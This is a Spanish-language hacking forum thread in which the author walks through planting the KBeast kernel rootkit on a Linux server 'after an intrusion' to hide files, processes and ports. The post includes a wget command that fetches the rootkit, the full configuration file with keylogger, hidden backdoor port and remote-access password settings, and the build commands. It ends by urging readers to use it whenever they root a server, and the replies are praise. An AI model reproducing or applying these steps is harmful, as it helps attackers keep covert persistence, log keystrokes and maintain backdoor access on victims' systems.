[KBEAST] Plantando un Rootkit

Iniciado por q3rv0, Octubre 02, 2012, 09:36:10 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Octubre 02, 2012, 09:36:10 PM Ultima modificación: Noviembre 23, 2014, 01:18:55 PM por Expermicid
Siempre es conveniente asegurarse el silencio luego de una intrusion, y con que me refiero al silencio? Ademas de entrar en el tema de borrado de huellas, me refiero a la accion de dejar un secuas en el servidor que se encargue de ocultar ciertos procesos, archivos, etc que dejemos en el target para esto voy a utilizar a KBeast que es un rootkit 2011, ademas de uno de mis preferidos, tiene soporte para los kernel 2.6.18 y 2.6.32,y presenta varias funcionalidades interesantes como:

-Ocultar archivos y directorios

-Ocultar procesos de (ps, pstree, top, lsof)

- Ocultar puertos locales abiertos (backdoors)

-Viene con un modulo keylogger incorporado para capturar las pulsaciones.

-Anti-kill para procesos

-Anti-remove para archivos

-Trae un backdoor bind incorporado

- Tambien se encarga de esconder ciertos modulos cargando en el kernel ademas de un anti-remove para estos.

bastante completita la basura!, demas esta decir que requerimos de privilegios de usuario root, en este caso lo voy a realizar en un debian con un kernel 2.6.32 (entorno controlado)

descargamos el rootkit.

Código: bash
wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz





una vez extraido nos encontramos con varios files, tendremos que editar a nuestro antojo el archivo de configuracion config.h


Código: text
/*
Kernel Beast Ver #1.0 - Configuration File
Copyright Ph03n1X of IPSECS (c) 2011
Get more research of ours http://ipsecs.com
*/

/*Don't change this line*/
#define TRUE 1
#define FALSE 0

/*
Enable keylog probably makes the system unstable
But worth to be tried
*/
#define _KEYLOG_ TRUE

/*Define your module & network daemon name*/
#define KBEAST "kbeast"

/*
All files, dirs, process will be hidden
Protected from deletion & being killed
*/
#define _H4X0R_ "_h4x_"

/*
Directory where your rootkit will be saved
You have to use _H4X0R_ in your directory name
No slash (/) at the end
*/
#define _H4X_PATH_ "/usr/_h4x_"

/*
File to save key logged data
*/
#define _LOGFILE_ "acctlog"

/*
This port will be hidded from netstat
*/
#define _HIDE_PORT_ 13377

/*
Password for remote access
*/
#define _RPASSWORD_ "h4x3d"
#define _MAGIC_NAME_ "bin"
/*
Magic signal & pid for local escalation
*/
#define _MAGIC_SIG_ 37 //kill signal
#define _MAGIC_PID_ 31337 //kill this pid


prosigo a explicar la funcion de cada linea en el fichero de configuracion.


1- La primera linea la dejamos tal cual esta

2- la segunda se encarga de activar el modulo keylogger del rootkit en caso contrario escribimos

Código: text
#define _KEYLOG_ FALSE



3- se encarga de darle el nombre al daemon rootkit


Código: text
#define KBEAST "q3rv0"


4 - En esta linea vamos a incluir los ficheros y directorios que queremos que sean protegidos por el anti-remove.

Código: text
#define _H4X0R_ "/home/q3rv0/protect/q3rv0.txt"


5- Define el directorio donde se guardara KBeast

Código: text
#define _H4X_PATH_ "/usr/share/kbeast"



6 - Aca especificamos el nombre del fichero de log donde van a ir a parar las pulsasiones capturadas por el keylogger

Código: text
#define _LOGFILE_ "acctlog"


7- El puerto que estara hide a la vista de los comandos anteriormente mencionados.

Código: text
#define _HIDE_PORT_ 6666


8- Incluimos el password para el acceso con el backdoor.

Código: text
#define _RPASSWORD_ "q3rv0"
#define _MAGIC_NAME_ "bin"


Habiendo terminado de configurar el ficherito, que bastante intuitivo es, si me saltee la 9, pero esa la dejo tal cual esta.


Procedemos a lanzar el rootkit de la siguiente manera.

En los kernel 2.6.18

Código: bash
./setup buil 0


En los 2.6.32 como es mi caso

Código: bash
./setup build






Vemos que se compilo exitosamente en el nucleo sin ningun error, ahora vamos a comprobar si cumple con nuestras espectativas.

-Verificando la proteccion anti-remove de ficheros




- Directorio donde se guarda el rootkit en el systema




- Pulsaciones capturadas por el modulo keylogger...
  El fichero de log se guarda en el directorio donde le indicamos que se guarde el rootkit.




- Port 6666 Hide




- Accediendo al sistema a travez del backdoor en el puerto 6666




- oka, para remover el rootkit del kernel solo basta realizar un:

Código: bash
./setup clean





Espero que lo hayan disfrutado y cada vez que rooteen un server acuerdense de kbeast :)


Saludos!











Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Octubre 02, 2012, 10:08:39 PM #1
Buenisimo man! terrible aporte!
+Karma!
Segui asi!

Octubre 02, 2012, 10:53:07 PM #2
Buen aporte man! Gracias

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".
Octubre 03, 2012, 12:10:15 AM #3
buen aporte man se agradece mucho
¡ aprender de los errores , llegaria muy lejos !
Octubre 03, 2012, 12:38:23 PM #4
Muchas gracias por el aporte  ;D
Octubre 03, 2012, 02:08:31 PM #5
Brutal man.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD
Octubre 05, 2012, 12:49:41 AM #6
 :o Brutal

Gracias por compartir

saludos
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Octubre 05, 2012, 01:08:40 AM #7
Muy buena wachin
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Octubre 25, 2012, 02:02:19 PM #8
Bien !!! como te dije en tu web está genial el tuto !! ;)
gracias por compartir
____________________________

my best crime is myself
Octubre 25, 2012, 07:07:55 PM #9 Ultima modificación: Abril 22, 2019, 02:09:46 PM por PlhaOGEOYceXkhd9rlYxJGzedkbolnxpnReqRiTk47d6JgDTRu
:)
Imprimir
Ir Arriba Páginas1
Acciones del Usuario